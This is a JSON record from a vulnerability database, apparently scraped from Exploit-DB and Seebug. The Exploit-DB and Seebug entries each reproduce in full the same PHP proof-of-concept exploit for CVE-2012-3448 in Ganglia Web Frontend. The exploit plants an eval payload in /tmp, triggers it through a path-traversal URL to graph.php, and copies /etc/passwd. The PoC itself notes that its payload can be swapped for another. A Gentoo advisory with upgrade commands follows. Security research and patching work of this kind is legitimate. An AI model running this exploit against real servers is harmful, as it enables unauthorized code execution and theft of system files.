"bulletinFamily": "exploit", "description": "Ganglia Web Frontend < 3.5.1 - PHP Code Execution. CVE-2012-3448. Webapps exploit for php platform", "modified": "2015-08-31T00:00:00", "published": "2015-08-31T00:00:00", "id": "EDB-ID:38030", "href": "https://www.exploit-db.com/exploits/38030/", "type": "exploitdb", "title": "Ganglia Web Frontend < 3.5.1 - PHP Code Execution", "sourceData": "<?php\r\n/*\r\n\r\n################################################################################\r\n#\r\n# Author : Andrei Costin (andrei theATsign firmware theDOTsign re)\r\n# Desc : CVE-2012-3448 PoC\r\n# Details : This PoC will create a dummy file in the /tmp folder and \r\n# will copy /etc/passwd to /tmp.\r\n# To modify the attack payload, modify the code below.\\\r\n# Setup : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0\r\n#\r\n################################################################################\r\n\r\n1. Assuming that ganglia is installed on the target machine at this path:\r\n/var/www/html/ganglia/\r\n\r\n2. Assuming the attacker has minimal access to the target machine and \r\ncan write to \"/tmp\". There are several methods where a remote attacker can \r\nalso trigger daemons or other system processes to create files in \"/tmp\" \r\nwhose content is (partially) controlled by the remote attacker. \r\n\r\n3. The attacker puts the contents of this PoC file into the file:\r\n/tmp/attack.php\r\n\r\n4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1 \r\nas:\r\nhttp://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY\r\n\r\n5. Confirm that the PoC created a dummy file in the /tmp folder and copied \r\n/etc/passwd to /tmp.\r\n\r\n*/\r\n\r\neval('touch(\"/tmp/attacker.touch\"); copy(\"/etc/passwd\", \"/tmp/attacker.passwd\");');\r\ndie(\"Triggering CVE-2012-3448 attack.php\");\r\n\r\n?>\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38030/"}], "seebug": [{"lastseen": "2017-11-19T12:29:55", "bulletinFamily": "exploit", "description": "<p>1. Assuming that ganglia is installed on the target machine at this path:</p><p>/var/www/html/ganglia/</p><p> </p><p>2. Assuming the attacker has minimal access to the target machine and </p><p>can write to \"/tmp\". There are several methods where a remote attacker can </p><p>also trigger daemons or other system processes to create files in \"/tmp\" </p><p>whose content is (partially) controlled by the remote attacker. </p><p> </p><p>3. The attacker puts the contents of this PoC file into the file:</p><p>/tmp/attack.php</p><p> </p><p>4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1 </p><p>as:</p><p><a href=\"http://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY\" rel=\"nofollow\">http://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY</a></p><p> </p><p>5. Confirm that the PoC created a dummy file in the /tmp folder and copied </p><p>/etc/passwd to /tmp.</p>", "modified": "2015-09-01T00:00:00", "published": "2015-09-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89282", "id": "SSV:89282", "type": "seebug", "title": "Ganglia Web Frontend < 3.5.1 - PHP Code Execution", "sourceData": "\n <?php\r\n/*\r\n \r\n################################################################################\r\n#\r\n# Author : Andrei Costin (andrei theATsign firmware theDOTsign re)\r\n# Desc : CVE-2012-3448 PoC\r\n# Details : This PoC will create a dummy file in the /tmp folder and \r\n# will copy /etc/passwd to /tmp.\r\n# To modify the attack payload, modify the code below.\\\r\n# Setup : Ubuntu Linux 14.04 LTS x86 with Ganglia Web Frontend 3.5.0\r\n#\r\n################################################################################\r\n \r\n1. Assuming that ganglia is installed on the target machine at this path:\r\n/var/www/html/ganglia/\r\n \r\n2. Assuming the attacker has minimal access to the target machine and \r\ncan write to \"/tmp\". There are several methods where a remote attacker can \r\nalso trigger daemons or other system processes to create files in \"/tmp\" \r\nwhose content is (partially) controlled by the remote attacker. \r\n \r\n3. The attacker puts the contents of this PoC file into the file:\r\n/tmp/attack.php\r\n \r\n4. The attacker visits the Ganglia Web Frontend interface with version < 3.5.1 \r\nas:\r\nhttp://targetIP/ganglia/graph.php?g=../../../../tmp/attack&metric=DUMMY&title=DUMMY\r\n \r\n5. Confirm that the PoC created a dummy file in the /tmp folder and copied \r\n/etc/passwd to /tmp.\r\n \r\n*/\r\n \r\neval('touch(\"/tmp/attacker.touch\"); copy(\"/etc/passwd\", \"/tmp/attacker.passwd\");');\r\ndie(\"Triggering CVE-2012-3448 attack.php\");\r\n \r\n?>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-89282", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:02", "bulletinFamily": "unix", "description": "### Background\n\nFor more information on the packages listed in this GLSA, please see their homepage referenced in the ebuild. \n\n### Description\n\nVulnerabilities have been discovered in the packages listed below. Please review the CVE identifiers in the Reference section for details. \n\n * EGroupware\n * VTE\n * Layer Four Traceroute (LFT)\n * Suhosin\n * Slock\n * Ganglia\n * Jabber to GaduGadu Gateway\n\n### Impact\n\nA context-dependent attacker may be able to gain escalated privileges, execute arbitrary code, cause Denial of Service, obtain sensitive information, or otherwise bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll EGroupware users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-apps/egroupware-1.8.004.20120613\"\n \n\nAll VTE 0.32 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=x11-libs/vte-0.32.2\"\n \n\nAll VTE 0.28 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=x11-libs/vte-0.28.2-r204\"\n \n\nAll Layer Four Traceroute users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/lft-3.33\"\n \n\nAll Suhosin users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-php/suhosin-0.9.33\"\n \n\nAll Slock users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=x11-misc/slock-1.0\"\n \n\nAll Ganglia users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-cluster/ganglia-3.3.7\"\n \n\nAll Jabber to GaduGadu Gateway users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-im/gg-transport-2.2.4\"\n \n\nNOTE: This is a legacy GLSA. Updates for all affected architectures have been available since 2013. It is likely that your system is already no longer affected by these issues.", "modified": "2014-12-11T00:00:00", "published": "2014-12-11T00:00:00", "id": "GLSA-201412-10", "href": "https://security.gentoo.org/glsa/201412-10", "type": "gentoo", "title": "Multiple packages, Multiple vulnerabilities fixed in 2012", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}